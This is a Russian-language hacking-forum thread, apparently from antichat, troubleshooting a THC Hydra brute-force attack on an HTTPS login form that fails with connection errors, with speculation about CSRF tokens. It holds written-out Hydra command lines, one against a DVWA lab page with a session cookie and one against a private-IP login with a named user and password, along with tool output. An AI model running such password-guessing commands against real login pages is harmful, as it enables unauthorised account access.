Не получается у меня брутить веб-форму по https. Выдает ошибку подключения. Почитал здесь: https://github.com/vanhauser-thc/thc-hydra/issues/40 , и пришел к выводу, что это CRSF-токен мешает. Какие есть способы это обойти? Помогите!

спарсить токен, отправить вместе с ним

а можно поподробнее? каким образом токен передается? В куки? А как команду для гидры написать, чтобы она куки передавала?

вряд ли, но зависит от реализации. в гидре - не знаю, самописным софтом запросто

hydra -s 443 -L users.txt -P pass.txt -e nsr 10.10.1.10 http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low; PHPSESSID=k73vfi85vvna3mchopebmcgc43"

Может так?

я, честно, еще пока даже не уверен, что проблема из-за CSRF токена. покажите полный и нормальный отснифанный запрос

Может, и не из-за токена

master@limimate ~/hydra-8.1 $ hydra -l nichenkoOV -p vfvfjkz -f -V 192.168.247.198 https-post-form "/index.php?login=yes:AUTH_FORM=Y&TYPE=AUTH&USER_LOGIN=^USER^&USER_PASSWORD=^PASS^:Неправильный логин или пароль" (https://hack.chat/?login=yes:AUTH_FORM=Y&TYPE=AUTH&backurl=/index.php&USER_LOGIN=^USER^&USER_PASSWORD=^PASS^:%D0%90%22) -s 443

Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2015-10-14 12:10:55

[DATA] max 1 task per 1 server, overall 64 tasks, 1 login try (l:1/p:1), ~0 tries per task

[DATA] attacking service http-post-form on port 443 with SSL

[ATTEMPT] target 192.168.247.198 - login "nichenkoOV" - pass "vfvfjkz" - 1 of 1 [child 0]

[ERROR] Child with pid 631 terminating, cannot connect

[RE-ATTEMPT] target 192.168.247.198 - login "nichenkoOV" - pass "vfvfjkz" - 1 of 1 [child 0]

[ERROR] Child with pid 632 terminating, cannot connect

[RE-ATTEMPT] target 192.168.247.198 - login "nichenkoOV" - pass "vfvfjkz" - 1 of 1 [child 0]

[ERROR] Child with pid 633 terminating, cannot connect

[STATUS] attack finished for 192.168.247.198 (waiting for children to finish) ...

1 of 1 target completed, 0 valid passwords found

Hydra (http://www.thc.org/thc-hydra) finished at 2015-10-14 12:10:55

Запрос, а не настройку для гидры.

Запрос? Вот хост: 192.168.247.198:443/index.php?login=yes (https://hack.chat/?login=yes:AUTH_FORM=Y&TYPE=AUTH&backurl=/index.php&USER_LOGIN=^USER^&USER_PASSWORD=^PASS^:%D0%90%22)

Вот POST: AUTH_FORM=Y&TYPE=AUTH&USER_LOGIN=USER&USER_PASSWORD=PASS (https://hack.chat/?login=yes:AUTH_FORM=Y&TYPE=AUTH&backurl=/index.php&USER_LOGIN=^USER^&USER_PASSWORD=^PASS^:%D0%90%22)

что еще нужно?

И где тут участвует CSRF токен?

Может и не участвует, но у чувака по ссылке такая же проблема, и ему разраб сказал, что это из-за csrf

тут точно не csrf

Devkalion said:
↑ (https://antichat.live/posts/3903682/)
тут точно не csrf


А что? Из-за чего ошибка?